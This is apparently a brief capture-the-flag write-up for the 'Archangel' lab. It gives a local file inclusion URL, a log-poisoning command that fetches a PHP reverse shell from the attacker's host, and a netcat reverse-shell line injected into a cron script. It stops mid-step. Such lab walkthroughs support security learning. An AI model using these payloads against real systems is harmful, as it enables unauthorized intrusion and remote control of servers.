Archangel
Archangel
๐ป You can see the email points to a domain, so I added it to my hosts file:
10.48.165.142 mafialive.thm

๐ I used this filter to view local files:
1
http://mafialive.thm/test.php?view=php://filter/convert.base64-encode/resource=/var/www/html/development_testing/test.php
๐ฏ I tried a basic shell reverse payload, but it didnโt work, so I decided to upload a PHP reverse shell:
I created a reverse shell file (re.php) and fetched it using wget:
1
http://mafialive.thm/test.php?view=/var/www/html/development_testing/.././.././../log/apache2/access.log&cmd=wget%20http://10.48.84.210:8000/re.php
โก Stabilize the shell:
1
2
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
๐ก Use this to edit the bash file so we can get the reverse shell:
1
echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.48.84.210 4445 >/tmp/f' > /opt/helloworld.sh
๐ I couldnโt get a connection back, so I opened a Python server to transfer the file locally: 
This post is licensed under CC BY 4.0 by the author.













